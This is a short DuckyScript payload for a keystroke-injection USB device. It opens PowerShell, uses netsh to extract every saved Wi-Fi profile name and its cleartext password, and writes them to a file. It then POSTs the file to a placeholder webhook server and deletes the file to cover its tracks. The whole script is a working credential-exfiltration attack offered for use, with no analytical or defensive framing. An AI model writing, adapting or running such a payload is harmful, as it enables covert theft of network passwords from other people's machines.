REM ######## Open PowerShell ########
DELAY 500
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 400

REM ######## Grab Wi-Fi password and list them all on Notepad document file ########
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >Notepad
ENTER
DELAY 400

REM ######## Send Notepad file to WebHook Server & Delete File ######## ######## https://webhook.site/ ########
STRING powershell Invoke-WebRequest -Uri <ServerURL> -Method POST -InFile Notepad
ENTER
DELAY 600
STRING del Notepad
ENTER
DELAY 300
STRING exit
ENTER